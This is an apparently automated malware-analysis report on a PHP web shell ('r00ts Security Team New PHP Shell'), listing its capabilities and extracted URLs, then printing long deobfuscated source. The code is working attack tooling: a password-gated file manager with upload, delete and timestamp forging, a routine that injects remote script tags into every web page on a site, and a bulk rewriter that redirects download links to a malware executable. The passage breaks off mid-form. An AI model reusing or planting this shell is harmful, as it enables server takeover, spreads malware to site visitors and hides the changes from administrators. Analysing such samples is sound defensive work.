Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Original)

Environment
error_reporting (Deobfuscated, Original)
getcwd (Deobfuscated, Original)
phpinfo (Deobfuscated, Original)
set_time_limit (Deobfuscated, Original)

Execution
eval (Deobfuscated, HTML, Original)
exec (Deobfuscated, Original)
passthru (Deobfuscated, Original)
proc_open (Deobfuscated, Original)
shell_exec (Deobfuscated, Original)
system (Deobfuscated, Original)

Files
copy (Deobfuscated, Original)
file_get_contents (Deobfuscated, Original)
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
 r00ts Security Team New PHP Shell 2012-2013  (Deobfuscated, Original)
localhost (HTML)

URLs
ftp://$ftpuser:$ftppass@$ftphost/$files (Original)
ftp.class.php (Deobfuscated, Original)
http://blog.taskkill.net/mm.exe (Deobfuscated, Original)
http://localhost/52520.php (HTML)
http://www.baidu.com/ad.js (Deobfuscated, Original)
http://www.baidu.com/ad.js?EMTDSU (Deobfuscated, Original)
http://www.baidu.com/download/muma.exe (Deobfuscated, Original)
http://www.html5rocks.com/en/tutorials/canvas/hidpi/ (HTML)
http://www.Wolvez.org (Deobfuscated, Original)
https://crbug.com/740629 (HTML)
https://w3c.github.io/gamepad/#remapping (HTML)
www.rootkit.net.cn (Deobfuscated, Original)

Deobfuscated PHP code
<?php

$password = "admin!@#";
//change password here
error_reporting(E_ERROR);
set_time_limit(0);
$lanip = getenv('REMOTE_ADDR');
function Root_GP(&$array)
{
    while (list($key, $var) = each($array)) {
        if ((strtoupper($key) != $key || '' . intval($key) == "{$key}") && $key != 'argc' && $key != 'argv') {
            if (is_string($var)) {
                $array[$key] = stripslashes($var);
            }
            if (is_array($var)) {
                $array[$key] = Root_GP($var);
            }
        }
    }
    return $array;
}
function Root_CSS()
{
    print "<style type=\"text/css\">\n\t*{padding:0; margin:0;}\n\tbody{background:threedface;font-family:\"Verdana\", \"Tahoma\", sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}\n\ta{color:#000000;text-decoration:none;}\n\ta:hover{background:#33FF33;}\n\ttable{color:#000000;font-family:\"Verdana\", \"Tahoma\", sans-serif;font-size:13px;border:1px solid #999999;}\n\ttd{background:#F9F6F4;}\n        .bt{background:#3d3d3d;color:#ffffff;border:2px;font:13px Arial,Tahoma;height:22px;}\n\t.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}\n\t.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}\n\t.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}\n</style>\n";
    return false;
}
//file manager
function File_Str($string)
{
    return str_replace('//', '/', str_replace('\\', '/', $string));
}
function File_Size($size)
{
    if ($size > 1073741824) {
        $size = round($size / 1073741824 * 100) / 100 . ' G';
    } elseif ($size > 1048576) {
        $size = round($size / 1048576 * 100) / 100 . ' M';
    } elseif ($size > 1024) {
        $size = round($size / 1024 * 100) / 100 . ' K';
    } else {
        $size .= ' B';
    }
    return $size;
}
function File_Mode()
{
    $RealPath = realpath('./');
    $SelfPath = $_SERVER['PHP_SELF'];
    $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
    return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function File_Read($filename)
{
    $handle = @fopen($filename, "rb");
    $filecode = @fread($handle, @filesize($filename));
    @fclose($handle);
    return $filecode;
}
function File_Write($filename, $filecode, $filemode)
{
    $handle = @fopen($filename, $filemode);
    $key = @fwrite($handle, $filecode);
    if (!$key) {
        @chmod($filename, 0666);
        $key = @fwrite($handle, $filecode);
    }
    @fclose($handle);
    return $key;
}
function File_Up($filea, $fileb)
{
    $key = @copy($filea, $fileb) ? true : false;
    if (!$key) {
        $key = @move_uploaded_file($filea, $fileb) ? true : false;
    }
    return $key;
}
function File_Down($filename)
{
    if (!file_exists($filename)) {
        return false;
    }
    $filedown = basename($filename);
    $array = explode('.', $filedown);
    $arrayend = array_pop($array);
    header('Content-type: application/x-' . $arrayend);
    header('Content-Disposition: attachment; filename=' . $filedown);
    header('Content-Length: ' . filesize($filename));
    @readfile($filename);
    exit;
}
function File_Deltree($deldir)
{
    if (($mydir = @opendir($deldir)) == NULL) {
        return false;
    }
    while (false !== ($file = @readdir($mydir))) {
        $name = File_Str($deldir . '/' . $file);
        if (is_dir($name) && $file != '.' && $file != '..') {
            @chmod($name, 0777);
            rmdir($name);
        }
        if (is_file($name)) {
            @chmod($name, 0777);
            @unlink($name);
        }
    }
    @closedir($mydir);
    @chmod($deldir, 0777);
    return @rmdir($deldir) ? true : false;
}
function File_Act($array, $actall, $inver)
{
    if (($count = count($array)) == 0) {
        return "select file plz";
    }
    $i = 0;
    while ($i < $count) {
        $array[$i] = urldecode($array[$i]);
        switch ($actall) {
            case "a":
                $inver = urldecode($inver);
                if (!is_dir($inver)) {
                    return "path error";
                }
                $filename = array_pop(explode('/', $array[$i]));
                @copy($array[$i], File_Str($inver . '/' . $filename));
                $msg = 'copy';
                break;
            case "b":
                if (!@unlink($array[$i])) {
                    @chmod($filename, 0666);
                    @unlink($array[$i]);
                }
                $msg = 'del';
                break;
            case "c":
                if (!eregi("^[0-7]{4}\$", $inver)) {
                    return "wrong attr value";
                }
                $newmode = base_convert($inver, 8, 10);
                @chmod($array[$i], $newmode);
                $msg = 'change attr';
                break;
            case "d":
                @touch($array[$i], strtotime($inver));
                $msg = 'change time';
                break;
        }
        $i++;
    }
    return 'select files ' . $msg . ' done';
}
function File_Edit($filepath, $filename, $dim = '')
{
    $THIS_DIR = urlencode($filepath);
    $THIS_FILE = File_Str($filepath . '/' . $filename);
    if (file_exists($THIS_FILE)) {
        $FILE_TIME = @date('Y-m-d H:i:s', filemtime($THIS_FILE));
        $FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));
    } else {
        $FILE_TIME = @date('Y-m-d H:i:s', time());
        $FILE_CODE = '';
    }
    print <<<END
<script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
\tvar txt, i, found;
\tif(str == "")return false;
\tif(NS4){
\t\tif(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
\t\tif(n == 0) alert(str + " ... Not-Find")
\t}
\tif(IE4){
\t\ttxt = win.document.body.createTextRange();
\t\tfor(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
\t\t\ttxt.moveStart("character", 1);
\t\t\ttxt.moveEnd("textedit")
\t\t}
\t\tif(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
\t\telse{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
\t}
\treturn false
}
function CheckDate(){
\tvar re = document.getElementById('mtime').value;
\tvar reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})\$/; 
\tvar r = re.match(reg);
\tif(r==null){alert('wrong time!format:yyyy-mm-dd hh:mm:ss');return false;}
\telse{document.getElementById('editor').submit();}
}
</script>
<div class="actall">search content: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type='button' value="search" onclick="search(searchs.value)"></div>
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
<div class="actall"><textarea name="pfc" style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall">change file time <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
<div class="actall"><input class="bt" type="button" value="save" onclick="CheckDate();">
<input class="bt" type="button" value="back" onclick="window.location='?s=a&p={$THIS_DIR}';"></div>
</form>
END;
}
function File_a($p)
{
    $MSG_BOX = 'waiting for message queue......';
    if (!$_SERVER['SERVER_NAME']) {
        $GETURL = '';
    } else {
        $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
    }
    $UP_DIR = urlencode(File_Str($p . '/..'));
    $REAL_DIR = File_Str(realpath($p));
    $FILE_DIR = File_Str("/var/www/html");
    $ROOT_DIR = File_Mode();
    $THIS_DIR = urlencode(File_Str($p));
    $UP_DIR = urlencode(File_Str(dirname($p)));
    $NUM_D = 0;
    $NUM_F = 0;
    if (!empty($_POST['pfn'])) {
        $intime = @strtotime($_POST['mtime']);
        $MSG_BOX = File_Write($_POST['pfn'], $_POST['pfc'], 'wb') ? 'edit file ' . $_POST['pfn'] . ' success' : 'edit file ' . $_POST['pfn'] . ' faild';
        @touch($_POST['pfn'], $intime);
    }
    if (!empty($_POST['ufs'])) {
        if ($_POST['ufn'] != '') {
            $upfilename = $_POST['ufn'];
        } else {
            $upfilename = $_FILES['ufp']['name'];
        }
        $MSG_BOX = File_Up($_FILES['ufp']['tmp_name'], File_Str($p . '/' . $upfilename)) ? 'upfile ' . $upfilename . ' success' : 'upfile ' . $upfilename . ' ʧ��';
    }
    if (!empty($_POST['actall'])) {
        $MSG_BOX = File_Act($_POST['files'], $_POST['actall'], $_POST['inver']);
    }
    if (!empty($_GET['mn'])) {
        $MSG_BOX = @rename(File_Str($p . '/' . $_GET['mn']), File_Str($p . '/' . $_GET['rn'])) ? 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' success' : 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' faild';
    }
    if (!empty($_GET['dn'])) {
        $MSG_BOX = @mkdir(File_Str($p . '/' . $_GET['dn']), 0777) ? 'create folder ' . $_GET['dn'] . ' success' : 'create folder ' . $_GET['dn'] . ' faild';
    }
    if (!empty($_GET['dd'])) {
        $MSG_BOX = File_Deltree($_GET['dd']) ? 'del folder ' . $_GET['dd'] . ' success' : 'del folder ' . $_GET['dd'] . ' faild';
    }
    if (!empty($_GET['df'])) {
        if (!File_Down($_GET['df'])) {
            $MSG_BOX = 'the download file does not exists';
        }
    }
    Root_CSS();
    print <<<END
<script type="text/javascript">
\tfunction Inputok(msg,gourl)
\t{
\t\tsmsg = "current file:[" + msg + "]";
\t\tre = prompt(smsg,unescape(msg));
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + escape(re);
\t\t\twindow.location = url;
\t\t}
\t}
\tfunction Delok(msg,gourl)
\t{
\t\tsmsg = "sure for del [" + unescape(msg) + "] ?";
\t\tif(confirm(smsg))
\t\t{
\t\t\tif(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();}
\t\t\telse window.location = gourl;
\t\t}
\t}
\tfunction CheckDate(msg,gourl)
\t{
\t\tsmsg = "current file time:[" + msg + "]";
\t\tre = prompt(smsg,msg);
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + re;
\t\t\tvar reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})\$/; 
\t\t\tvar r = re.match(reg);
\t\t\tif(r==null){alert('time error!format:yyyy-mm-dd hh:mm:ss');return false;}
\t\t\telse{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
\t\t}
\t}
\tfunction CheckAll(form)
\t{
\t\tfor(var i=0;i<form.elements.length;i++)
\t\t{
\t\t\tvar e = form.elements[i];
\t\t\tif (e.name != 'chkall')
\t\t\te.checked = form.chkall.checked;
\t\t}
\t}
\tfunction SubmitUrl(msg,txt,actid)
\t{
\t\tre = prompt(msg,unescape(txt));
\t\tif(re)
\t\t{
\t\t\tdocument.getElementById('actall').value = actid;
\t\t\tdocument.getElementById('inver').value = escape(re);
\t\t\tdocument.getElementById('fileall').submit();
\t\t}
\t}
</script>
\t<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
\t<div class="actall" style="text-align:center;padding:3px;">
\t<form method="GET"><input type="hidden" name="s" value="a">
\t<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
\t<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
\t<option>---some folder---</option>
\t<option value="{$ROOT_DIR}"> site root folder </option>
\t<option value="{$FILE_DIR}"> current folder </option>
\t<option value="C:/Documents and Settings/All Users/\xa1\xb8\xbf\xaa\xca\xbc\xa1\xb9\xb2\xcb\xb5\xa5/\xb3\xcc\xd0\xf2/\xc6\xf4\xb6\xaf"> start item (cn) </option>
\t<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> start item (en) </option>
\t<option value="C:/RECYCLER"> RECYCLER </option>
\t<option value="C:/Program Files"> Program Files </option>
\t</select> <input class="bt" type="submit" value="jump"></form>
\t<div style="margin-top:3px;"></div>
\t<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
\t<input class="bt" type="button" value="Create File" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
\t<input class="bt" type="button" value="Create Folder" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
\t<input type="file" name="ufp" style="width:30%;height:22px;">
\t<input type="text" name="ufn" style="width:20%;height:22px;">
\t<input class="bt" type="submit" name="ufs" value="upfile">
\t</form>
\t</div>
\t<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
\t<table border="0"><tr>
\t<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>parent directory</b></a> </td>
\t<td class="toptd" style="width:100px;"> opertion </td>
\t<td class="toptd" style="width:60px;"> attr </td>
\t<td class="toptd" style="width:200px;"> time </td>
\t<td class="toptd" style="width:100px;"> size </td></tr>
END;
    if (($h_d = @opendir($p)) == NULL) {
        return false;
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' or $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($p . '/' . $Filename);
        if (is_dir($Filepath)) {
            $Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
            $Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
            $Filepath = urlencode($Filepath);
            echo "\n<tr><td><a href=\"?s=a&p=" . $Filepath . '"><font face="wingdings" size="3">0</font><b>' . $Filename . '</b></a></td>';
            $Filename = urlencode($Filename);
            echo '<td><a href="#" onclick="Delok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&dd=' . $Filename . '\');return false;">Del</a> ';
            echo '<a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;">Rename</a></td>';
            echo '<td><a href="#" onclick="Inputok(\'' . $Fileperm . '\',\'?s=a&p=' . $THIS_DIR . '&mk=' . $Filename . '&md=\');return false;">' . $Fileperm . '</a></td>';
            echo '<td>' . $Filetime . '</td> ';
            echo "<td> </td></tr>\n";
            $NUM_D++;
        }
    }
    @rewinddir($h_d);
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' or $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($REAL_DIR . '/' . $Filename);
        if (!is_dir($Filepath)) {
            $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $Filepath);
            $Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
            $Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
            $Filesize = File_Size(@filesize($Filepath));
            if ($Filepath == File_Str("/var/www/html/52520.php.3d3474a7d76347cdb3be87db9d617f65.bin")) {
                $fname = '<font color="#FF0000">' . $Filename . '</font>';
            } else {
                $fname = $Filename;
            }
            echo "\r\n <tr><td> <input type=\"checkbox\" name=\"files[]\" value=\"" . urlencode($Filepath) . '"><a target="_blank" href="' . $Fileurls . '">' . $fname . '</a> </td>';
            $Filepath = urlencode($Filepath);
            $Filename = urlencode($Filename);
            echo ' <td> <a href="?s=p&fp=' . $THIS_DIR . '&fn=' . $Filename . '"> Edit </a> ';
            echo ' <a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;"> Rename </a> </td>';
            echo ' <td>' . $Fileperm . '</td> ';
            echo ' <td>' . $Filetime . '</td> ';
            echo ' <td align="right"> <a href="?s=a&df=' . $Filepath . '">' . $Filesize . '</a> </td></tr> ' . "\r\n";
            $NUM_F++;
        }
    }
    @closedir($h_d);
    print <<<END
</table>
<div class="actall"><input type="hidden" name="actall" value="undefined">
<input type="hidden" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input class="bt" type="button" value="Copy" onclick="SubmitUrl('copy selected files to folder: ','{$THIS_DIR}','a');return false;"> 
<input class="bt" type="button" value="Del" onclick="Delok('selected files','b');return false;"> 
<input class="bt" type="button" value="Attr" onclick="SubmitUrl('change selected files attr value: ','0666','c');return false;"> 
<input class="bt" type="button" value="Time" onclick="CheckDate('2010-04-21 17:31:20','d');return false;"> 
folders({$NUM_D}) / files({$NUM_F})</div>
</form>
END;
    return true;
}
//Insert Trojan
function Guama_Pass($length)
{
    $possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $str = "";
    while (strlen($str) < $length) {
        $str .= substr($possible, rand() % strlen($possible), 1);
    }
    return $str;
}
function Guama_Auto($gp, $gt, $gl, $gc, $incode, $gk, $gd, $gb, $go)
{
    if (($h_d = @opendir($gp)) == NULL) {
        return false;
    }
    if ($go) {
        preg_match_all("/\\[\\-([^~]*?)\\-\\]/i", $gc, $nc);
        $passm = (int) $nc[1][0];
        if (!eregi("^[0-9]{1,2}\$", $nc[1][0]) || $passm > 12) {
            return false;
        }
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' || $Filename == '..') {
            continue;
        }
        if ($gl != '') {
            if (eregi($gl, $Filename)) {
                continue;
            }
        }
        $Filepath = File_Str($gp . '/' . $Filename);
        if (is_dir($Filepath) && $gb) {
            Guama_Auto($Filepath, $gt, $gl, $gc, $incode, $gk, $gd, $gb, $go);
        }
        if (eregi($gt, $Filename)) {
            $ic = File_Read($Filepath);
            if (stristr($ic, $gk)) {
                continue;
            }
            if ($go) {
                $gc = str_replace($nc[0][0], Guama_Pass($passm), $gc);
            }
            if ($gd) {
                $ftime = @filemtime($Filepath);
            }
            if ($incode == '1') {
                if (!stristr($ic, '</head>')) {
                    continue;
                }
                $ic = str_replace('</head>', "\r\n" . $gc . "\r\n" . '</head>' . "\r\n", $ic);
                $ic = str_replace('</HEAD>', "\r\n" . $gc . "\r\n" . '</HEAD>' . "\r\n", $ic);
            }
            if ($incode == '2') {
                $ic = $gc . "\r\n" . $ic;
            }
            if ($incode == '3') {
                $ic = $ic . "\r\n" . $gc;
            }
            echo File_Write($Filepath, $ic, 'wb') ? 'ok:' . $Filepath . '<br>' . "\r\n" : 'err:' . $Filepath . '<br>' . "\r\n";
            if ($gd) {
                @touch($Filepath, $ftime);
            }
            ob_flush();
            flush();
        }
    }
    @closedir($h_d);
    return true;
}
function Guama_b()
{
    if (!empty($_POST['gp']) && !empty($_POST['gt']) && !empty($_POST['gc'])) {
        $gk = '';
        $go = false;
        $gt = str_replace('.', '\\.', $_POST['gt']);
        $gl = isset($_POST['gl']) ? str_replace('.', '\\.', $_POST['gl']) : '';
        $gd = isset($_POST['gd']) ? true : false;
        $gb = $_POST['gb'] == 'a' ? true : false;
        if (isset($_POST['gx'])) {
            $gk = $_POST['gc'];
            if (stristr($_POST['gc'], '[-') && stristr($_POST['gc'], '-]')) {
                $temp = explode('[-', $_POST['gc']);
                $gk = $temp[0];
                $go = true;
            }
        }
        echo Guama_Auto($_POST['gp'], $gt, $gl, $_POST['gc'], $_POST['incode'], $gk, $gd, $gb, $go) ? 'Done' : 'Abort';
        echo "<br><input class=\"bt\" type=\"button\" value=\"back\" onclick=\"history.back();\">";
        return false;
    }
    $FILE_DIR = File_Str("/var/www/html");
    $ROOT_DIR = File_Mode();
    print <<<END
<script language="javascript">
function Fulll(i){
\tif(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
  return true;
}
function autorun(){
\tif(document.getElementById('gp').value == ''){alert('path can not be empty');return false;}
\tif(document.getElementById('gt').value == ''){alert('type can not be empty');return false;}
\tif(document.getElementById('gc').value == ''){alert('code can not be empty');return false;}
\tdocument.getElementById('sform').submit();
}
</script>
<form method="POST" name="sform" id="sform" action="?s=b">
<div class="actall" style="height:35px;">Path: <input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fulll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="gt" id="gt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fulll(options[selectedIndex].value)'>
<option value="0" selected>--select  type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">JS</option>
</select></div>
<div class="actall" style="height:35px;">Filter: <input type="text" name="gl" value="templet|templets|default|editor|fckeditor.html" style="width:500px;" disabled>
<input type="radio" name="inout" onclick="gl.disabled=false;">Open <input type="radio" name="inout" onclick="gl.disabled=true;" checked>Close</div>
<div class="actall">Insert Code: <textarea name="gc" id="gc" style="width:610px;height:180px;">&lt;script language=javascript src="http://www.baidu.com/ad.js?[-6-]"&gt;&lt;/script&gt;</textarea>
<div class="msgbox">\xb9\xd2\xc2\xed\xb1\xe4\xd0\xce\xcb\xb5\xc3\xf7: \xb3\xcc\xd0\xf2\xd7\xd4\xb6\xaf\xd1\xb0\xd5\xd2[-6-]\xb1\xea\xc7\xa9,\xcc\xe6\xbb\xbb\xce\xaa\xcb\xe6\xbb\xfa\xd7\xd6\xb7\xfb,6\xb1\xed\xca\xbe\xc1\xf9\xce\xbb\xcb\xe6\xbb\xfa\xd7\xd6\xb7\xfb,\xd7\xee\xb4\xf312\xce\xbb,\xc8\xe7\xb9\xfb\xb2\xbb\xb1\xe4\xd0\xce\xbf\xc9\xd2\xd4\xb2\xbb\xbc\xd3[-6-]\xb1\xea\xc7\xa9.
<br>Example: &lt;script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"&gt;&lt;/script&gt;</div></div>
<div class="actall" style="height:35px;"><input type="radio" name="incode" value="1" checked>insert before &lt;/head&gt; 
<input type="radio" name="incode" value="2">insert the top of file 
<input type="radio" name="incode" value="3">insert the end of file</div>
<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>Automatic filter double code <input type="checkbox" name="gd" value="1" checked>keep file time unchanged</div>
<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="gb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="Insert" onclick="autorun();"></div>
</form>
END;
    return true;
}
//clean code
function Qingma_Auto($qp, $qt, $qc, $qd, $qb)
{
    if (($h_d = @opendir($qp)) == NULL) {
        return false;
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' || $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($qp . '/' . $Filename);
        if (is_dir($Filepath) && $qb) {
            Qingma_Auto($Filepath, $qt, $qc, $qd, $qb);
        }
        if (eregi($qt, $Filename)) {
            $ic = File_Read($Filepath);
            if (!stristr($ic, $qc)) {
                continue;
            }
            $ic = str_replace($qc, '', $ic);
            if ($qd) {
                $ftime = @filemtime($Filepath);
            }
            echo File_Write($Filepath, $ic, 'wb') ? 'ok:' . $Filepath . '<br>' . "\r\n" : 'err:' . $Filepath . '<br>' . "\r\n";
            if ($qd) {
                @touch($Filepath, $ftime);
            }
            ob_flush();
            flush();
        }
    }
    @closedir($h_d);
    return true;
}
function Qingma_c()
{
    if (!empty($_POST['qp']) && !empty($_POST['qt']) && !empty($_POST['qc'])) {
        $qt = str_replace('.', '\\.', $_POST['qt']);
        $qd = isset($_POST['qd']) ? true : false;
        $qb = $_POST['qb'] == 'a' ? true : false;
        echo Qingma_Auto($_POST['qp'], $qt, $_POST['qc'], $qd, $qb) ? 'Done' : 'Abort';
        echo "<br><input class=\"bt\" type=\"button\" value=\"back\" onclick=\"history.back();\">";
        return false;
    }
    $FILE_DIR = File_Str("/var/www/html");
    $ROOT_DIR = File_Mode();
    print <<<END
<script language="javascript">
function Fullll(i){
\tif(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
\telse{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
  return true;
}
function autoup(){
\tif(document.getElementById('qp').value == ''){alert('path can not be empty');return false;}
\tif(document.getElementById('qt').value == ''){alert('type can not be empty');return false;}
\tif(document.getElementById('qc').value == ''){alert('code can not be empty');return false;}
\tdocument.getElementById('xform').submit();
}
</script>
<form method="POST" name="xform" id="xform" action="?s=c">
<div class="actall" style="height:35px;">Path: <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fullll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="qt" id="qt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fullll(options[selectedIndex].value)'>
<option value="0" selected>--select type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">js</option>
</select></div>
<div class="actall">Clean Code <textarea name="qc" id="qc" style="width:610px;height:180px;">&lt;script language=javascript src="http://www.baidu.com/ad.js"&gt;&lt;/script&gt;</textarea></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>keep file time unchanged</div>
<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="qb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="begin" onclick="autoup();"></div>
</form>
END;
    return true;
}
//bulk replace
function Tihuan_Auto($tp, $tt, $th, $tca, $tcb, $td, $tb)
{
    if (($h_d = @opendir($tp)) == NULL) {
        return false;
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' || $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($tp . '/' . $Filename);
        if (is_dir($Filepath) && $tb) {
            Tihuan_Auto($Filepath, $tt, $th, $tca, $tcb, $td, $tb);
        }
        $doing = false;
        if (eregi($tt, $Filename)) {
            $ic = File_Read($Filepath);
            if ($th) {
                if (!stristr($ic, $tca)) {
                    continue;
                }
                $ic = str_replace($tca, $tcb, $ic);
                $doing = true;
            } else {
                preg_match_all("/\\<a href\\=\"([^~]*?)\"/i", $ic, $nc);
                for ($i = 0; $i < count($nc[1]); $i++) {
                    if (eregi($tca, $nc[1][$i])) {
                        $ic = str_replace($nc[1][$i], $tcb, $ic);
                        $doing = true;
                    }
                }
            }
            if ($td) {
                $ftime = @filemtime($Filepath);
            }
            if ($doing) {
                echo File_Write($Filepath, $ic, 'wb') ? 'ok:' . $Filepath . '<br>' . "\r\n" : 'err:' . $Filepath . '<br>' . "\r\n";
            }
            if ($td) {
                @touch($Filepath, $ftime);
            }
            ob_flush();
            flush();
        }
    }
    @closedir($h_d);
    return true;
}
function Tihuan_d()
{
    if (!empty($_POST['tp']) && !empty($_POST['tt'])) {
        $tt = str_replace('.', '\\.', $_POST['tt']);
        $td = isset($_POST['td']) ? true : false;
        $tb = $_POST['tb'] == 'a' ? true : false;
        $th = $_POST['th'] == 'a' ? true : false;
        if ($th) {
            $_POST['tca'] = str_replace('.', '\\.', $_POST['tca']);
        }
        echo Tihuan_Auto($_POST['tp'], $tt, $th, $_POST['tca'], $_POST['tcb'], $td, $tb) ? 'Done' : 'Abort';
        echo "<br><input class=\"bt\" type=\"button\" value=\"back\" onclick=\"window.location='?s=d'\">";
        return false;
    }
    $FILE_DIR = File_Str("/var/www/html");
    $ROOT_DIR = File_Mode();
    print <<<END
<script language="javascript">
function Fulllll(i){
\tif(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
\telse{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
  return true;
}
function showth(th){
\tif(th == 'a') document.getElementById('setauto').innerHTML = '<tr>Searchment</tr> <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
\tif(th == 'b') document.getElementById('setauto').innerHTML = '<br><tr>Download Suffix</tr> <input type="text" name="tca" id="tca" value=".exe|.z0|.rar|.zip|.gz|.torrent" style="width:500px;"><br><br>&nbsp&nbsp&nbspReplacement&nbsp&nbsp&nbsp<input type="text" name="tcb" id="tcb" value="http://www.baidu.com/download/muma.exe" style="width:500px;">';
\treturn true;
}
function autoup(){
\tif(document.getElementById('tp').value == ''){alert('path can not be empty');return false;}
\tif(document.getElementById('tt').value == ''){alert('type can not be empty');return false;}
\tif(document.getElementById('tca').value == '' || document.getElementById('tcb').value == ''){alert('replacement can not be empty');return false;}
\tdocument.getElementById('tform').submit();
}
</script>
<form method="POST" name="tform" id="tform" action="?s=d">
